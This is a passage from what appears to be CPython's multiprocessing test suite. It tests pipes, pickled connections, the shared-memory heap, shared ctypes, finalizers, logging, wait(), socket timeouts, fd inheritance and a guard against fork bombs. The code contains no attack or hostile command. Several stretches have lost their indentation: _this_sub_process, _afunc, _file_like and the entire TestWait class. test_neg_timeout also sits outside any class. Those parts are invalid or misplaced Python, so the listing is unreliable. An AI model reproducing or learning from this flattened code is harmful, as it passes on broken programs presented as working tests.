            time.sleep(0.1)
            conn.send_bytes(s)
        conn.close()

    def test_strings(self):
        strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
        a, b = self.Pipe()
        p = self.Process(target=self._child_strings, args=(b, strings))
        p.start()

        for s in strings:
            # Poll until the next message arrives (up to ~2 seconds).
            for i in range(200):
                if a.poll(0.01):
                    break
            x = a.recv_bytes()
            self.assertEqual(s, x)

        p.join()

    @classmethod
    def _child_boundaries(cls, r):
        # Polling may "pull" a message in to the child process, but we
        # don't want it to pull only part of a message, as that would
        # corrupt the pipe for any other processes which might later
        # read from it.
        r.poll(5)

    def test_boundaries(self):
        r, w = self.Pipe(False)
        p = self.Process(target=self._child_boundaries, args=(r,))
        p.start()
        time.sleep(2)
        L = [b"first", b"second"]
        for obj in L:
            w.send_bytes(obj)
        w.close()
        p.join()
        # Whichever message remains must be intact, never a fragment.
        self.assertIn(r.recv_bytes(), L)

    @classmethod
    def _child_dont_merge(cls, b):
        b.send_bytes(b'a')
        b.send_bytes(b'b')
        b.send_bytes(b'cd')

    def test_dont_merge(self):
        # Distinct send_bytes() calls must stay distinct messages.
        a, b = self.Pipe()
        self.assertEqual(a.poll(0.0), False)
        self.assertEqual(a.poll(0.1), False)

        p = self.Process(target=self._child_dont_merge, args=(b,))
        p.start()

        self.assertEqual(a.recv_bytes(), b'a')
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.recv_bytes(), b'b')
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.poll(0.0), True)
        self.assertEqual(a.recv_bytes(), b'cd')

        p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
    """Sending Connection and socket objects between processes via pickle
    (handle duplication through multiprocessing.reduction)."""

    ALLOWED_TYPES = ('processes',)

    @classmethod
    def tearDownClass(cls):
        from multiprocessing import resource_sharer
        resource_sharer.stop(timeout=TIMEOUT)

    @classmethod
    def _listener(cls, conn, families):
        # Child 1: for each family, open a Listener, report its address,
        # accept a connection and ship that connection back to the parent.
        for fam in families:
            l = cls.connection.Listener(family=fam)
            conn.send(l.address)
            new_conn = l.accept()
            conn.send(new_conn)
            new_conn.close()
            l.close()

        # Same dance once more with a plain socket.
        l = socket.socket()
        l.bind((test.support.HOST, 0))
        l.listen()
        conn.send(l.getsockname())
        new_conn, addr = l.accept()
        conn.send(new_conn)
        new_conn.close()
        l.close()

        conn.recv()

    @classmethod
    def _remote(cls, conn):
        # Child 2: connect to each received address and send the
        # upper-cased message; None terminates the loop.
        for (address, msg) in iter(conn.recv, None):
            client = cls.connection.Client(address)
            client.send(msg.upper())
            client.close()

        address, msg = conn.recv()
        client = socket.socket()
        client.connect(address)
        client.sendall(msg.upper())
        client.close()

        conn.close()

    def test_pickling(self):
        families = self.connection.families

        lconn, lconn0 = self.Pipe()
        lp = self.Process(target=self._listener, args=(lconn0, families))
        lp.daemon = True
        lp.start()
        lconn0.close()

        rconn, rconn0 = self.Pipe()
        rp = self.Process(target=self._remote, args=(rconn0,))
        rp.daemon = True
        rp.start()
        rconn0.close()

        for fam in families:
            msg = ('This connection uses family %s' % fam).encode('ascii')
            address = lconn.recv()
            rconn.send((address, msg))
            # The accepted connection itself is pickled across the pipe.
            new_conn = lconn.recv()
            self.assertEqual(new_conn.recv(), msg.upper())

        rconn.send(None)

        msg = latin('This connection uses a normal socket')
        address = lconn.recv()
        rconn.send((address, msg))
        new_conn = lconn.recv()
        buf = []
        while True:
            s = new_conn.recv(100)
            if not s:
                break
            buf.append(s)
        buf = b''.join(buf)
        self.assertEqual(buf, msg.upper())
        new_conn.close()

        lconn.send(None)

        rconn.close()
        lconn.close()

        lp.join()
        rp.join()

    @classmethod
    def child_access(cls, conn):
        # Child: use connections received over *conn* in both directions.
        w = conn.recv()
        w.send('all is well')
        w.close()

        r = conn.recv()
        msg = r.recv()
        conn.send(msg*2)

        conn.close()

    def test_access(self):
        # On Windows, if we do not specify a destination pid when
        # using DupHandle then we need to be careful to use the
        # correct access flags for DuplicateHandle(), or else
        # DupHandle.detach() will raise PermissionError.  For example,
        # for a read only pipe handle we should use
        # access=FILE_GENERIC_READ.  (Unfortunately
        # DUPLICATE_SAME_ACCESS does not work.)
        conn, child_conn = self.Pipe()
        p = self.Process(target=self.child_access, args=(child_conn,))
        p.daemon = True
        p.start()
        child_conn.close()

        r, w = self.Pipe(duplex=False)
        conn.send(w)
        w.close()
        self.assertEqual(r.recv(), 'all is well')
        r.close()

        r, w = self.Pipe(duplex=False)
        conn.send(r)
        r.close()
        w.send('foobar')
        w.close()
        self.assertEqual(conn.recv(), 'foobar'*2)

        p.join()
#
#
#
class _TestHeap(BaseTestCase):
    """White-box tests for multiprocessing.heap's arena allocator."""

    ALLOWED_TYPES = ('processes',)

    def test_heap(self):
        iterations = 5000
        maxblocks = 50
        blocks = []

        # create and destroy lots of blocks of different sizes
        for i in range(iterations):
            size = int(random.lognormvariate(0, 1) * 1000)
            b = multiprocessing.heap.BufferWrapper(size)
            blocks.append(b)
            if len(blocks) > maxblocks:
                i = random.randrange(maxblocks)
                del blocks[i]

        # get the heap object
        heap = multiprocessing.heap.BufferWrapper._heap

        # verify the state of the heap: collect every free and occupied
        # block as (arena-index, start, stop, length, state) tuples.
        all = []
        occupied = 0
        heap._lock.acquire()
        self.addCleanup(heap._lock.release)
        for L in list(heap._len_to_seq.values()):
            for arena, start, stop in L:
                all.append((heap._arenas.index(arena), start, stop,
                            stop-start, 'free'))
        for arena, start, stop in heap._allocated_blocks:
            all.append((heap._arenas.index(arena), start, stop,
                        stop-start, 'occupied'))
            occupied += (stop-start)

        all.sort()

        # Adjacent blocks must tile each arena exactly: each block either
        # starts where the previous one stopped, or opens a new arena at 0.
        for i in range(len(all)-1):
            (arena, start, stop) = all[i][:3]
            (narena, nstart, nstop) = all[i+1][:3]
            self.assertTrue((arena != narena and nstart == 0) or
                            (stop == nstart))

    def test_free_from_gc(self):
        # Check that freeing of blocks by the garbage collector doesn't deadlock
        # (issue #12352).
        # Make sure the GC is enabled, and set lower collection thresholds to
        # make collections more frequent (and increase the probability of
        # deadlock).
        if not gc.isenabled():
            gc.enable()
            self.addCleanup(gc.disable)
        thresholds = gc.get_threshold()
        self.addCleanup(gc.set_threshold, *thresholds)
        gc.set_threshold(10)

        # perform numerous block allocations, with cyclic references to make
        # sure objects are collected asynchronously by the gc
        for i in range(5000):
            a = multiprocessing.heap.BufferWrapper(1)
            b = multiprocessing.heap.BufferWrapper(1)
            # circular references
            a.buddy = b
            b.buddy = a
#
#
#
class _Foo(Structure):
    # ctypes structure shared between processes by _TestSharedCTypes.
    # Field order is part of the binary layout -- do not reorder.
    _fields_ = [
        ('x', c_int),
        ('y', c_double),
        ('z', c_longlong,)
        ]
class _TestSharedCTypes(BaseTestCase):
    """Tests for multiprocessing.sharedctypes Value/Array across a fork."""

    ALLOWED_TYPES = ('processes',)

    def setUp(self):
        if not HAS_SHAREDCTYPES:
            self.skipTest("requires multiprocessing.sharedctypes")

    @classmethod
    def _double(cls, x, y, z, foo, arr, string):
        # Child: double every shared value in place; the parent then
        # observes the mutations through shared memory.
        x.value *= 2
        y.value *= 2
        z.value *= 2
        foo.x *= 2
        foo.y *= 2
        string.value *= 2
        for i in range(len(arr)):
            arr[i] *= 2

    def test_sharedctypes(self, lock=False):
        x = Value('i', 7, lock=lock)
        y = Value(c_double, 1.0/3.0, lock=lock)
        z = Value(c_longlong, 2 ** 33, lock=lock)
        foo = Value(_Foo, 3, 2, lock=lock)
        arr = self.Array('d', list(range(10)), lock=lock)
        string = self.Array('c', 20, lock=lock)
        string.value = latin('hello')

        p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
        p.daemon = True
        p.start()
        p.join()

        self.assertEqual(x.value, 14)
        self.assertAlmostEqual(y.value, 2.0/3.0)
        self.assertEqual(z.value, 2 ** 34)
        self.assertEqual(foo.x, 6)
        self.assertAlmostEqual(foo.y, 4.0)
        for i in range(10):
            self.assertAlmostEqual(arr[i], i*2)
        self.assertEqual(string.value, latin('hellohello'))

    def test_synchronize(self):
        # Same as above, but with a synchronization wrapper around each value.
        self.test_sharedctypes(lock=True)

    def test_copy(self):
        # sharedctypes.copy() must produce an independent snapshot.
        foo = _Foo(2, 5.0, 2 ** 33)
        bar = copy(foo)
        foo.x = 0
        foo.y = 0
        foo.z = 0
        self.assertEqual(bar.x, 2)
        self.assertAlmostEqual(bar.y, 5.0)
        self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
    """Tests for util.Finalize callbacks and their exit-time ordering."""

    ALLOWED_TYPES = ('processes',)

    def setUp(self):
        # Isolate the global finalizer registry for the duration of a test.
        self.registry_backup = util._finalizer_registry.copy()
        util._finalizer_registry.clear()

    def tearDown(self):
        self.assertFalse(util._finalizer_registry)
        util._finalizer_registry.update(self.registry_backup)

    @classmethod
    def _test_finalize(cls, conn):
        class Foo(object):
            pass

        a = Foo()
        util.Finalize(a, conn.send, args=('a',))
        del a  # triggers callback for a

        b = Foo()
        close_b = util.Finalize(b, conn.send, args=('b',))
        close_b()  # triggers callback for b
        close_b()  # does nothing because callback has already been called
        del b      # does nothing because callback has already been called

        c = Foo()
        util.Finalize(c, conn.send, args=('c',))

        d10 = Foo()
        util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)

        d01 = Foo()
        util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
        d02 = Foo()
        util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
        d03 = Foo()
        util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)

        util.Finalize(None, conn.send, args=('e',), exitpriority=-10)

        util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)

        # call multiprocessing's cleanup function then exit process without
        # garbage collecting locals
        util._exit_function()
        conn.close()
        os._exit(0)

    def test_finalize(self):
        conn, child_conn = self.Pipe()

        p = self.Process(target=self._test_finalize, args=(child_conn,))
        p.daemon = True
        p.start()
        p.join()

        result = [obj for obj in iter(conn.recv, 'STOP')]
        # Higher exitpriority runs first; equal priorities run in reverse
        # registration order; 'c' has no exitpriority and is not run at exit.
        self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])

    def test_thread_safety(self):
        # bpo-24484: _run_finalizers() should be thread-safe
        def cb():
            pass

        class Foo(object):
            def __init__(self):
                self.ref = self  # create reference cycle
                # insert finalizer at random key
                util.Finalize(self, cb, exitpriority=random.randint(1, 100))

        finish = False
        exc = None

        def run_finalizers():
            nonlocal exc
            while not finish:
                time.sleep(random.random() * 1e-1)
                try:
                    # A GC run will eventually happen during this,
                    # collecting stale Foo's and mutating the registry
                    util._run_finalizers()
                except Exception as e:
                    exc = e

        def make_finalizers():
            nonlocal exc
            d = {}
            while not finish:
                try:
                    # Old Foo's get gradually replaced and later
                    # collected by the GC (because of the cyclic ref)
                    d[random.getrandbits(5)] = {Foo() for i in range(10)}
                except Exception as e:
                    exc = e
                    d.clear()

        old_interval = sys.getswitchinterval()
        old_threshold = gc.get_threshold()
        try:
            # Aggressive switching + low GC thresholds maximize the chance
            # of hitting the original race.
            sys.setswitchinterval(1e-6)
            gc.set_threshold(5, 5, 5)
            threads = [threading.Thread(target=run_finalizers),
                       threading.Thread(target=make_finalizers)]
            with test.support.start_threads(threads):
                time.sleep(4.0)  # Wait a bit to trigger race condition
            finish = True
            if exc is not None:
                raise exc
        finally:
            sys.setswitchinterval(old_interval)
            gc.set_threshold(*old_threshold)
            gc.collect()  # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
    """Check that every multiprocessing submodule defines a sane __all__."""

    def get_module_names(self):
        # Enumerate multiprocessing.* module names from the package folder.
        import glob
        folder = os.path.dirname(multiprocessing.__file__)
        pattern = os.path.join(folder, '*.py')
        files = glob.glob(pattern)
        modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
        modules = ['multiprocessing.' + m for m in modules]
        modules.remove('multiprocessing.__init__')
        modules.append('multiprocessing')
        return modules

    def test_import(self):
        modules = self.get_module_names()
        # Drop modules that cannot be imported on this platform/build.
        if sys.platform == 'win32':
            modules.remove('multiprocessing.popen_fork')
            modules.remove('multiprocessing.popen_forkserver')
            modules.remove('multiprocessing.popen_spawn_posix')
        else:
            modules.remove('multiprocessing.popen_spawn_win32')
            if not HAS_REDUCTION:
                modules.remove('multiprocessing.popen_forkserver')

        if c_int is None:
            # This module requires _ctypes
            modules.remove('multiprocessing.sharedctypes')

        for name in modules:
            __import__(name)
            mod = sys.modules[name]
            self.assertTrue(hasattr(mod, '__all__'), name)

            # Every name advertised in __all__ must actually exist.
            for attr in mod.__all__:
                self.assertTrue(
                    hasattr(mod, attr),
                    '%r does not have attribute %r' % (mod, attr)
                    )
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
    """Quick test that logging works -- does not test logging output."""

    ALLOWED_TYPES = ('processes',)

    def test_enable_logging(self):
        logger = multiprocessing.get_logger()
        logger.setLevel(util.SUBWARNING)
        self.assertTrue(logger is not None)
        logger.debug('this will not be printed')
        logger.info('nor will this')
        # Restore the level expected by the rest of the test suite.
        logger.setLevel(LOG_LEVEL)

    @classmethod
    def _test_level(cls, conn):
        # Child: report the effective level it inherited.
        logger = multiprocessing.get_logger()
        conn.send(logger.getEffectiveLevel())

    def test_level(self):
        LEVEL1 = 32
        LEVEL2 = 37

        logger = multiprocessing.get_logger()
        root_logger = logging.getLogger()
        root_level = root_logger.level

        reader, writer = multiprocessing.Pipe(duplex=False)

        # Level set directly on the multiprocessing logger propagates.
        logger.setLevel(LEVEL1)
        p = self.Process(target=self._test_level, args=(writer,))
        p.start()
        self.assertEqual(LEVEL1, reader.recv())
        p.join()
        p.close()

        # With NOTSET, the level is inherited from the root logger.
        logger.setLevel(logging.NOTSET)
        root_logger.setLevel(LEVEL2)
        p = self.Process(target=self._test_level, args=(writer,))
        p.start()
        self.assertEqual(LEVEL2, reader.recv())
        p.join()
        p.close()

        root_logger.setLevel(root_level)
        logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
    """Check that Process.join() retries if os.waitpid() fails with EINTR."""

    ALLOWED_TYPES = ('processes',)

    @classmethod
    def _killer(cls, pid):
        # Child: interrupt the parent's join() with SIGUSR1 shortly after start.
        time.sleep(0.1)
        os.kill(pid, signal.SIGUSR1)

    @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
    def test_poll_eintr(self):
        got_signal = [False]
        def record(*args):
            got_signal[0] = True
        pid = os.getpid()
        oldhandler = signal.signal(signal.SIGUSR1, record)
        try:
            killer = self.Process(target=self._killer, args=(pid,))
            killer.start()
            try:
                p = self.Process(target=time.sleep, args=(2,))
                p.start()
                # join() is interrupted by the signal but must still
                # wait for the child and report a clean exit.
                p.join()
            finally:
                killer.join()
            self.assertTrue(got_signal[0])
            self.assertEqual(p.exitcode, 0)
        finally:
            signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
    """Issue 3321: a Connection built around a bogus OS handle must raise
    a normal exception instead of crashing the interpreter."""

    @unittest.skipIf(WIN32, "skipped on Windows")
    def test_invalid_handles(self):
        bogus = multiprocessing.connection.Connection(44977608)
        try:
            # poll() on a garbage handle may raise, but must not crash.
            bogus.poll()
        except (ValueError, OSError):
            pass
        finally:
            # Hack private attribute _handle to avoid printing an error
            # in conn.__del__
            bogus._handle = None
        # A negative handle is rejected outright at construction time.
        self.assertRaises((ValueError, OSError),
                          multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
    """Authentication-handshake failure paths for connection objects."""
    # TODO: add more tests for deliver/answer challenge.

    def test_deliver_challenge_auth_failure(self):
        class BogusConnection(object):
            # Always answers the challenge with garbage.
            def recv_bytes(self, size):
                return b'something bogus'
            def send_bytes(self, data):
                pass
        with self.assertRaises(multiprocessing.AuthenticationError):
            multiprocessing.connection.deliver_challenge(
                BogusConnection(), b'abc')

    def test_answer_challenge_auth_failure(self):
        class BogusConnection(object):
            # First recv looks like a genuine challenge, the follow-up
            # verification message is garbage.
            def __init__(self):
                self.count = 0
            def recv_bytes(self, size):
                self.count += 1
                if self.count == 1:
                    return multiprocessing.connection.CHALLENGE
                if self.count == 2:
                    return b'something bogus'
                return b''
            def send_bytes(self, data):
                pass
        with self.assertRaises(multiprocessing.AuthenticationError):
            multiprocessing.connection.answer_challenge(
                BogusConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
    """Manager/Pool initializer used by TestInitializers: increment the
    shared namespace's ``test`` counter once per worker start-up."""
    ns.test = ns.test + 1
class TestInitializers(unittest.TestCase):
    """Issue 5585: Manager.start() and Pool() accept an initializer that
    runs once in each server/worker process."""

    def setUp(self):
        self.mgr = multiprocessing.Manager()
        self.ns = self.mgr.Namespace()
        self.ns.test = 0

    def tearDown(self):
        self.mgr.shutdown()
        self.mgr.join()

    def test_manager_initializer(self):
        m = multiprocessing.managers.SyncManager()
        # A non-callable initializer must be rejected.
        self.assertRaises(TypeError, m.start, 1)
        m.start(initializer, (self.ns,))
        self.assertEqual(self.ns.test, 1)
        m.shutdown()
        m.join()

    def test_pool_initializer(self):
        self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
        # One worker -> initializer runs exactly once.
        p = multiprocessing.Pool(1, initializer, (self.ns,))
        p.close()
        p.join()
        self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
    """Spawn a daemon child that polls a fresh (empty) queue, then wait
    for it to finish.  Used by TestStdinBadfiledescriptor."""
    q = multiprocessing.Queue()
    child = multiprocessing.Process(target=_this_sub_process, args=(q,))
    child.daemon = True
    child.start()
    child.join()
def _afunc(x):
return x*x
def pool_in_process():
    """Exercise creating and using a Pool from inside another process.

    The mapped results are deliberately discarded -- the point is that the
    Pool machinery works when the caller is itself a child process
    (issues 5155/5313/5331).  The original bound the result to an unused
    local; this version also guarantees close()/join() run even if map()
    raises, so worker processes are never leaked.
    """
    pool = multiprocessing.Pool(processes=4)
    try:
        pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
    finally:
        pool.close()
        pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
    """Issues 5155, 5313, 5331: multiprocessing objects must work when
    created inside a child process (os.close(sys.stdin.fileno()) vs.
    sys.stdin.close() behavior)."""

    def test_queue_in_process(self):
        proc = multiprocessing.Process(target=_test_process)
        proc.start()
        proc.join()

    def test_pool_in_process(self):
        p = multiprocessing.Process(target=pool_in_process)
        p.start()
        p.join()

    def test_flushing(self):
        sio = io.StringIO()
        flike = _file_like(sio)
        flike.write('foo')
        # NOTE(review): this Process is never started; it appears to exist
        # only to check that merely constructing one does not disturb
        # flike's per-process cache -- confirm before removing.
        proc = multiprocessing.Process(target=lambda: flike.flush())
        flike.flush()
        # Was a bare `assert`, which is silently stripped under -O;
        # use the unittest assertion so the check always runs.
        self.assertEqual(sio.getvalue(), 'foo')
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
    # A negative timeout must behave like zero: poll once, return at once.
    from multiprocessing.connection import wait
    a, b = multiprocessing.Pipe()
    t = time.time()
    res = wait([a], timeout=-1)
    t = time.time() - t
    self.assertEqual(res, [])
    self.assertLess(t, 1)
    a.close()
    b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
    """Issue 14151: Listener must reject an address whose implied family
    is not usable on the current platform."""

    @unittest.skipIf(WIN32, "skipped on Windows")
    def test_invalid_family(self):
        # A named-pipe style address is Windows-only.
        with self.assertRaises(ValueError):
            multiprocessing.connection.Listener(r'\\.\test')

    @unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
    def test_invalid_family_win32(self):
        # A filesystem (AF_UNIX style) address is not valid on Windows.
        with self.assertRaises(ValueError):
            multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
    """Issue 12098: sys.flags of a spawned child must match the parent's."""

    @classmethod
    def run_in_grandchild(cls, conn):
        # Report this interpreter's flags back through the pipe.
        conn.send(tuple(sys.flags))

    @classmethod
    def run_in_child(cls):
        import json
        r, w = multiprocessing.Pipe(duplex=False)
        p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
        p.start()
        grandchild_flags = r.recv()
        p.join()
        r.close()
        w.close()
        flags = (tuple(sys.flags), grandchild_flags)
        # Serialized to stdout so test_flags() in the parent can parse it.
        print(json.dumps(flags))

    def test_flags(self):
        import json, subprocess
        # start child process using unusual flags
        prog = ('from test._test_multiprocessing import TestFlags; ' +
                'TestFlags.run_in_child()')
        data = subprocess.check_output(
            [sys.executable, '-E', '-S', '-O', '-c', prog])
        child_flags, grandchild_flags = json.loads(data.decode('ascii'))
        self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
    """Issue #6056: a global default socket timeout must not break
    multiprocessing connections."""

    @classmethod
    def _test_timeout(cls, child, address):
        time.sleep(1)
        child.send(123)
        child.close()
        conn = multiprocessing.connection.Client(address)
        conn.send(456)
        conn.close()

    def test_timeout(self):
        old_timeout = socket.getdefaulttimeout()
        try:
            # Default timeout far shorter than the child's 1s sleep.
            socket.setdefaulttimeout(0.1)
            parent, child = multiprocessing.Pipe(duplex=True)
            l = multiprocessing.connection.Listener(family='AF_INET')
            p = multiprocessing.Process(target=self._test_timeout,
                                        args=(child, l.address))
            p.start()
            child.close()
            self.assertEqual(parent.recv(), 123)
            parent.close()
            conn = l.accept()
            self.assertEqual(conn.recv(), 456)
            conn.close()
            l.close()
            join_process(p)
        finally:
            socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
    """Spawn/forkserver must raise instead of fork-bombing when a script
    lacks the ``if __name__ == '__main__'`` guard."""

    def test_noforkbomb(self):
        sm = multiprocessing.get_start_method()
        name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
        if sm != 'fork':
            # The child re-imports the main module and must fail with
            # RuntimeError rather than recurse forever.
            rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
            self.assertEqual(out, b'')
            self.assertIn(b'RuntimeError', err)
        else:
            # Plain fork does not re-import, so the script just works.
            rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
            self.assertEqual(out.rstrip(), b'123')
            self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
    # We recursively start processes. Issue #17555 meant that the
    # after fork registry would get duplicate entries for the same
    # lock. The size of the registry at generation n was ~2**n.
    @classmethod
    def child(cls, n, conn):
        if n > 1:
            p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
            p.start()
            conn.close()
            join_process(p)
        else:
            # Deepest descendant reports its registry size to the top.
            conn.send(len(util._afterfork_registry))
            conn.close()

    def test_lock(self):
        r, w = multiprocessing.Pipe(False)
        l = util.ForkAwareThreadLock()
        old_size = len(util._afterfork_registry)
        p = multiprocessing.Process(target=self.child, args=(5, w))
        p.start()
        w.close()
        new_size = r.recv()
        join_process(p)
        # The registry must not grow across generations of children.
        self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
    """Non-forked child processes must not inherit unneeded fds/handles."""

    def get_high_socket_fd(self):
        if WIN32:
            # The child process will not have any socket handles, so
            # calling socket.fromfd() should produce WSAENOTSOCK even
            # if there is a handle of the same number.
            return socket.socket().detach()
        else:
            # We want to produce a socket with an fd high enough that a
            # freshly created child process will not have any fds as high.
            fd = socket.socket().detach()
            to_close = []
            while fd < 50:
                to_close.append(fd)
                fd = os.dup(fd)
            for x in to_close:
                os.close(x)
            return fd

    def close(self, fd):
        if WIN32:
            socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
        else:
            os.close(fd)

    @classmethod
    def _test_closefds(cls, conn, fd):
        # In the child: adopting the fd fails iff it was not inherited.
        try:
            s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
        except Exception as e:
            conn.send(e)
        else:
            s.close()
            conn.send(None)

    def test_closefd(self):
        if not HAS_REDUCTION:
            raise unittest.SkipTest('requires fd pickling')
        reader, writer = multiprocessing.Pipe()
        fd = self.get_high_socket_fd()
        try:
            p = multiprocessing.Process(target=self._test_closefds,
                                        args=(writer, fd))
            p.start()
            writer.close()
            e = reader.recv()
            join_process(p)
        finally:
            self.close(fd)
            writer.close()
            reader.close()
        # 'fork' children inherit everything; spawn/forkserver must not.
        if multiprocessing.get_start_method() == 'fork':
            self.assertIs(e, None)
        else:
            WSAENOTSOCK = 10038
            self.assertIsInstance(e, OSError)
            self.assertTrue(e.errno == errno.EBADF or
                            e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
    """Issue #17097: EINTR should be ignored by recv(), send(), accept() etc."""

    # Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
    CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)

    @classmethod
    def _test_ignore(cls, conn):
        def handler(signum, frame):
            pass
        signal.signal(signal.SIGUSR1, handler)
        conn.send('ready')
        x = conn.recv()
        conn.send(x)
        # Large enough to block in send while the parent signals us.
